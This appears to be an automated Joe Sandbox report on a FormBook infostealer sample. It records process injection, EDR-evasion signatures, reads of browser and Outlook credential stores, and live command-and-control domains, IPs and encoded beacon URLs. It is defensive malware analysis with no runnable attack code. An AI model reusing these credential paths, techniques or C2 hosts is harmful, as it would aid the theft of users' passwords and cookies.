            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RpcPing.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: xBzBOQwywT.exeBinary or memory string: WIN_XP
            Source: xBzBOQwywT.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: xBzBOQwywT.exeBinary or memory string: WIN_XPe
            Source: xBzBOQwywT.exeBinary or memory string: WIN_VISTA
            Source: xBzBOQwywT.exeBinary or memory string: WIN_7
            Source: xBzBOQwywT.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551188 Sample: xBzBOQwywT.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 28 www.demovix.xyz 2->28 30 www.animekuid.xyz 2->30 32 14 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 5 other signatures 2->50 10 xBzBOQwywT.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 IpIaYUETnYWFH.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RpcPing.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 IpIaYUETnYWFH.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.shanhaiguan.net 156.242.132.82, 50002, 50003, 50004 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 22->34 36 www.falconclub.online 74.208.236.25, 49712, 49713, 49714 ONEANDONE-ASBrauerstrasse48DE United States 22->36 38 4 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            xBzBOQwywT.exe71%ReversingLabsWin32.Backdoor.FormBook
            xBzBOQwywT.exe100%AviraTR/AD.Swotter.xlnzp
            xBzBOQwywT.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.doggieradio.net/szy7/0%Avira URL Cloudsafe
            http://www.childlesscatlady.today/itly/?F2=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouFUFoXNGv3nAP+8PLYYLXnvdwJlki1+XL6LziD5lvjPEK7Q==&sHS=543hApwHD0%Avira URL Cloudsafe
            http://www.promasterev.shop/abrg/100%Avira URL Cloudmalware
            http://www.palcoconnector.net/px.js?ch=20%Avira URL Cloudsafe
            http://www.falconclub.online/sld7/100%Avira URL Cloudmalware
            http://www.palcoconnector.net/px.js?ch=10%Avira URL Cloudsafe
            http://www.multileveltravel.world/hfue/?sHS=543hApwHD&F2=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+Mnekgs9Dtqmg1if+oIl65BopybHLADU68if1oWKFmqENabDE70MA==0%Avira URL Cloudsafe
            http://www.promasterev.shop/abrg/?F2=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CXoS/lp19JNeFf5Feq2s9J88WlfAexgO/UytfAJO4SOXJGQ==&sHS=543hApwHD100%Avira URL Cloudmalware
            http://www.palcoconnector.net/bnrz/0%Avira URL Cloudsafe
            http://www.shanhaiguan.net/b6g5/0%Avira URL Cloudsafe
            http://www.falconclub.online/sld7/?F2=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlzyIrvo6u+6+g1Ilwo5dhHoQBd/NfHtrD7TOfEhTSvK6UN8A==&sHS=543hApwHD100%Avira URL Cloudmalware
            http://www.childlesscatlady.today/itly/0%Avira URL Cloudsafe
            http://www.doggieradio.net/szy7/?F2=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2zyO1xKTiz6oBrNu4Rs3SGBcTrpTqDeJ9pPLW36ghW+11Rw==&sHS=543hApwHD0%Avira URL Cloudsafe
            http://www.shanhaiguan.net/b6g5/?F2=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrS2CJxsBKcruwu6mzHCImmdlnckGZwJuxb62mJXIzJiBU08Q==&sHS=543hApwHD0%Avira URL Cloudsafe
            http://www.es-lidl.online0%Avira URL Cloudsafe
            http://www.palcoconnector.net/bnrz/?F2=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq485u0/vrhbrCPm9Wbu3FX/PMpZ3p2821/Za72d+YrU3sps/g==&sHS=543hApwHD0%Avira URL Cloudsafe
            http://www.demovix.xyz/azuc/?F2=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRjS9f0ml2OHl666AhHB2VhosEmVxlyD8Sfr3+gvtJ58MzMw==&sHS=543hApwHD0%Avira URL Cloudsafe
            http://www.es-lidl.online/n2dv/0%Avira URL Cloudsafe
            http://www.palcoconnector.net/sk-logabpstatus.php?a=bXhMcnlwZUVZbkR2TkpqRG0xWnc5ZTNMZlFTSjFybmRCeWl00%Avira URL Cloudsafe
            http://www.demovix.xyz/azuc/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            doggieradio.net
            		3.33.130.190
            		truetrue
              		unknown
              www.palcoconnector.net
              		208.91.197.27
              		truetrue
                		unknown
                promasterev.shop
                		3.33.130.190
                		truetrue
                  		unknown
                  es-lidl.online
                  		84.32.84.32
                  		truetrue
                    		unknown
                    childlesscatlady.today
                    		3.33.130.190
                    		truetrue
                      		unknown
                      www.demovix.xyz
                      		199.192.19.19
                      		truetrue
                        		unknown
                        www.falconclub.online
                        		74.208.236.25
                        		truetrue
                          		unknown
                          www.shanhaiguan.net
                          		156.242.132.82
                          		truetrue
                            		unknown
                            multileveltravel.world
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.es-lidl.online
                              		unknown
                              		unknowntrue
                                		unknown
                                www.multileveltravel.world
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.childlesscatlady.today
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.animekuid.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.mtcep.org
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.promasterev.shop
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.doggieradio.net
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.promasterev.shop/abrg/?F2=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CXoS/lp19JNeFf5Feq2s9J88WlfAexgO/UytfAJO4SOXJGQ==&sHS=543hApwHDtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.shanhaiguan.net/b6g5/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.childlesscatlady.today/itly/?F2=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouFUFoXNGv3nAP+8PLYYLXnvdwJlki1+XL6LziD5lvjPEK7Q==&sHS=543hApwHDtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.palcoconnector.net/bnrz/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.promasterev.shop/abrg/true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.falconclub.online/sld7/true
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.doggieradio.net/szy7/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.multileveltravel.world/hfue/?sHS=543hApwHD&F2=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+Mnekgs9Dtqmg1if+oIl65BopybHLADU68if1oWKFmqENabDE70MA==true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.falconclub.online/sld7/?F2=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlzyIrvo6u+6+g1Ilwo5dhHoQBd/NfHtrD7TOfEhTSvK6UN8A==&sHS=543hApwHDtrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.childlesscatlady.today/itly/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.demovix.xyz/azuc/?F2=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRjS9f0ml2OHl666AhHB2VhosEmVxlyD8Sfr3+gvtJ58MzMw==&sHS=543hApwHDtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.es-lidl.online/n2dv/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.palcoconnector.net/bnrz/?F2=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq485u0/vrhbrCPm9Wbu3FX/PMpZ3p2821/Za72d+YrU3sps/g==&sHS=543hApwHDtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.doggieradio.net/szy7/?F2=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2zyO1xKTiz6oBrNu4Rs3SGBcTrpTqDeJ9pPLW36ghW+11Rw==&sHS=543hApwHDtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.demovix.xyz/azuc/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.shanhaiguan.net/b6g5/?F2=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrS2CJxsBKcruwu6mzHCImmdlnckGZwJuxb62mJXIzJiBU08Q==&sHS=543hApwHDtrue
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.palcoconnector.net/px.js?ch=2RpcPing.exe, 00000005.00000002.3367266886.0000000004462000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3368903830.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.palcoconnector.net/px.js?ch=1RpcPing.exe, 00000005.00000002.3367266886.0000000004462000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3368903830.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/chrome_newtabRpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://dts.gnpge.comIpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoRpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssRpcPing.exe, 00000005.00000002.3367266886.00000000042D0000.00000004.10000000.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003600000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ac.ecosia.org/autocomplete?q=RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsRpcPing.exe, 00000005.00000002.3367266886.00000000042D0000.00000004.10000000.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003600000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.es-lidl.onlineIpIaYUETnYWFH.exe, 00000006.00000002.3367695283.0000000004D3A000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssRpcPing.exe, 00000005.00000002.3367266886.00000000042D0000.00000004.10000000.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003600000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RpcPing.exe, 00000005.00000003.1993105571.000000000773E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.palcoconnector.net/sk-logabpstatus.php?a=bXhMcnlwZUVZbkR2TkpqRG0xWnc5ZTNMZlFTSjFybmRCeWl0RpcPing.exe, 00000005.00000002.3367266886.0000000004462000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.3368903830.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3365902751.0000000003792000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      156.242.132.82
                                                                      		www.shanhaiguan.netSeychelles
                                                                      		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                      208.91.197.27
                                                                      		www.palcoconnector.netVirgin Islands (BRITISH)
                                                                      		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                      84.32.84.32
                                                                      		es-lidl.onlineLithuania
                                                                      		33922NTT-LT-ASLTtrue
                                                                      74.208.236.25
                                                                      		www.falconclub.onlineUnited States
                                                                      		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                      3.33.130.190
                                                                      		doggieradio.netUnited States
                                                                      		8987AMAZONEXPANSIONGBtrue
                                                                      199.192.19.19
                                                                      		www.demovix.xyzUnited States
                                                                      		22612NAMECHEAP-NETUStrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1551188
                                                                      Start date and time:2024-11-07 15:25:49 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 39s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Run name:Run with higher sleep bypass
                                                                      Number of analysed new started processes analysed:10
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:2
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:xBzBOQwywT.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:648cf23613834f4fba89ced0a881139a1883bf00c1c12172fbc7ee53a143e5ef.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/2@16/6
                                                                      EGA Information:
                                                                      • Successful, ratio: 75%
                                                                      HCA Information:
                                                                      • Successful, ratio: 96%
                                                                      • Number of executed functions: 54
                                                                      • Number of non-executed functions: 297
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target IpIaYUETnYWFH.exe, PID 5368 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: xBzBOQwywT.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      09:27:59API Interceptor6093668x Sleep call for process: RpcPing.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      156.242.132.82N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shanhaiguan.net/b6g5/
                                                                      PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shanhaiguan.net/p2q3/
                                                                      NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shanhaiguan.net/p2q3/
                                                                      DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shanhaiguan.net/p2q3/
                                                                      PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shanhaiguan.net/p2q3/
                                                                      208.91.197.27Hesap.exeGet hashmaliciousFormBookBrowse
                                                                      • www.martaschrimpf.info/qr9f/
                                                                      XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
